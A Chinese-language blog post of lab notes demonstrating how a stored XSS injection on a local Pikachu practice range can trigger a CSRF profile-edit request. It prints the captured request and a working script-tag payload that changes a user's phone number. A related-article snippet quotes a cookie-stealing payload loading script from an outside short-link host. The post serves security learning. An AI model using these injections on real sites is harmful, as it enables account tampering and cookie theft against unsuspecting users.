【xss结合csrf实验】

最新推荐文章于 2024-06-19 15:28:18 发布
最新推荐文章于 2024-06-19 15:28:18 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 学习笔记 文章标签: xss csrf php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/126745852
版权

文章目录

前言

通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例

一、实验介绍

漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。

本实验由本地搭建的pikachu靶场做演示。

二、实验步骤

1.用户登录

在这里插入图片描述
在这里插入图片描述

2.抓取信息修改的url

GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=11111111113&add=usa&email=lili%40pikachu.com&submit=submit

在这里插入图片描述

也就是说只要提交这个url,就可以修改用户信息

3.构造xss语句

<script src='http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=11111111112&add=usa&email=lili%40pikachu.com&submit=submit'> </script>

初始电话为11111111113,修改电话为11111111112

4.插入xss语句

在这里插入图片描述

5.查看用户信息已被修改

在这里插入图片描述

总结

本期简单介绍了xss漏洞与csrf漏洞的配合使用

一纸-荒芜
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
xss+csrf的组合拳
wo41ge的博客
12-16 3257
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储型 XSS + CSRF
XSS+CSRF组合拳
weixin_50464560的博客
03-12 2455
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
csrf+xss组合拳
最新发布
m0_68976043的博客
06-19 581
靶场cms文章管理系统。
学习 xss+csrf 组合拳
weixin_67259816的博客
05-28 3299
该篇文章记录了xss+csrf的组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
通过XSS实现CSRF
止水
06-19 518
最近在学习xss攻击,但没有实际的操作,不会有深入的理解,所以我在seg的一个页面上,通过留言一段js脚本,实现xss,这里实际在提交评论后会打印我的cookie,当然只拿到我自己的cookie是不涉及什么安全问题的,但如果能拿到别人的cookie就可以进行冒充别人的登录操作了,也就是通过XSS实现了CSRF ...
XSSCSRF
qq_44832048的博客
07-18 227
XSS 反射型XSS,也叫做“非持久型XSS”,只是简单的把用户输入的数据“反射”给浏览器; 存储型XSS,也叫做“持久型XSS”,会把用户输入的数据“存储在”服务器端。常见的场景是,黑客写下一篇含有恶意JavaScript代码的博客文章,文章发表后,所有访问该博客文章的用户,都会在他们的浏览器中执行这段恶意的JavaScript代码; DOM Based XSS,从...
Web 安全XSSCSRF
技术小屋
04-08 282
前言 目前web安全问题主要有下面几个: XSS漏洞 CSRF漏洞 XSS 跨站脚本攻击(Cross Site Scripting),攻击者往 Web 页面插入恶意的 Script 脚本代码,当用户访问页面的时候,嵌入的脚本代码就会执行,这样,攻击者可以通过 Script 脚本代码获取用户的 cookie 等信息,模拟用户的请求等达到攻击目的。 XSS 分类 存储型:X...
WEB漏洞测试(三)——CSRF结合XSS攻击
qq_28241149的博客
03-04 2272
一.CSRF攻击 首先我们来看下什么叫做CSRF攻击,CSRF是一种伪造请求访问网站的方式,我们都知道B/S架构是基于HTTP请求完成前后端的通讯的,假设我其实不是真正的网站前端而伪造请求进行访问后台,就会产生一定的危险。 举例说,假设我登录A网站购买某产品,但是B网站伪造A网站购买产品的请求去访问A网站的后台接口,这就是一种CSRF的攻击了。 那么问题来了,B网站实际上并没有登
web安全xss/csrf)简单攻击原理和防御方案(实战篇)
m0_71744044的博客
01-29 211
最近在学习node,就顺便写了web安全攻击的示例以及解决方案。
WEB漏洞——CSRF
qq_63594215的博客
04-11 806
这次我来讲讲web漏洞的CSRF笔记总结,主要通过原理、类型、示例以及防御的角度展开说明,希望读者受益。CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。CSRF是通过伪装用户的请求来利用网站,利用网站漏洞从用户那里盗取信息说白了,就是攻击者盗用了你的身份,以你的名义发送恶意请求。
一次csrf配合xss的攻击实例
aiquan9342的博客
03-16 392
xss出现在我的邮箱处 alert of payload "><script>alert(/test/)</script><" by cookie of payload "><script src=http://t.cn/RxQ4lz8></script><" csrf依旧是出现在“我的...
xss+csrf组合拳这么玩
yggcwhat
05-28 946
xss+csrf组合拳这么玩
CSRFXSS组合拳
weixin_60719780的博客
01-17 1127
简单的xsscsrf的组合利用
ctf xss利用_Csrf+Xss组合拳
weixin_39865952的博客
12-12 347
各位大师傅,第一次在合天发文章,请多多关照今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)0x01这个站是我疫情时候在线上网课的平台,本着对信息安全做贡献的目的下去做的这个渗透工作(咳咳,这个平台有个签到,每次签到我都在与大脑作斗争,最后争不过大脑,选择了睡觉,最后旷课太多,不搞要挂...
这一次彻底搞懂CSRFXSS
Always-Learning
12-12 3082
CSRF攻击 一、什么是CSRF攻击? CSRF指的是跨站请求伪造,是一种挟制用户在当前已经登录的Web应用程序上执行非本意操作的攻击方法。CSRF利用的是:一旦用户通过网站服务的身份认证,网站就完全信任该用户,受害者持有的权限级别决定了CSRF攻击的影响范围。 二、CSRF攻击流程 主要步骤包含下列六个步骤: 用户浏览并登陆信任网站A。 网站A验证通过后,在用户处产生A的Cookie。 用户在没有退出网站A的情况下,访问了危险网站B。 危险网站B要求用户访问第三方站点A,并发出了一个请求。 用户
XSSCSRF
培训班的蜗牛
11-05 876
感谢《码农翻身》的文章让我深刻记住这两种攻击方式。 1、《浏览器家族的安全反击战》 2、 《黑客三兄弟》 3、  《黑客三兄弟续》  下面是我的整理内容: 目录 矛与盾教量: 矛:利用js获取其他网站的cookie  盾:JS 同源策略 {protocol, host, port} 矛:JS 注入 盾:cookie 添加 HttpOnly 属性 禁止js 读取 矛:JS 假造...
存储型XSSCSRF联合漏洞利用(CVE-2017-9064 CVE-2019-16117 )
FODKING的博客
11-29 2948
CVE-2019-16117(XSS实验环境: 软件版本:wordpress-5.2.2 插件版本:photo-gallery.1.5.34 实验原理: 攻击者在页面插入xss代码,服务端将数据存入数据库,当用户访问存在xss漏洞的页面时,服务端从数据库取出数据展示到页面上,导致xss代码执行,达到攻击效果. 实验场景: 只要用户点击了存在XSS代码的网页就会弹出数据,或者点击了构建的图片也会构成XSS攻击。 漏洞复现: 插件下载:Photo Gallery by 10Web – Mobile-Frie
反射型XSS+文件上传+CSRF组合系列—DVWA
北风
11-04 855
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/83713678 在学习的过程中,想到将几种漏洞进行组合练习,记录下学习过程。大佬请绕过!谢谢!! 测试环境:DVWA,安装方法参考上一篇:https://blog.csdn.net/qq_36711453/article/details/83713631 前期知识:了解反...
理解XSSCSRF:攻击原理与防御策略
"详解XSSCSRF简述及预防措施" XSS(Cross Site Scripting)和CSRF(Cross-Site Request Forgery)是网络安全中两种常见的攻击手段,针对Web应用程序,给用户数据和系统安全带来严重威胁。了解并防范这两种攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值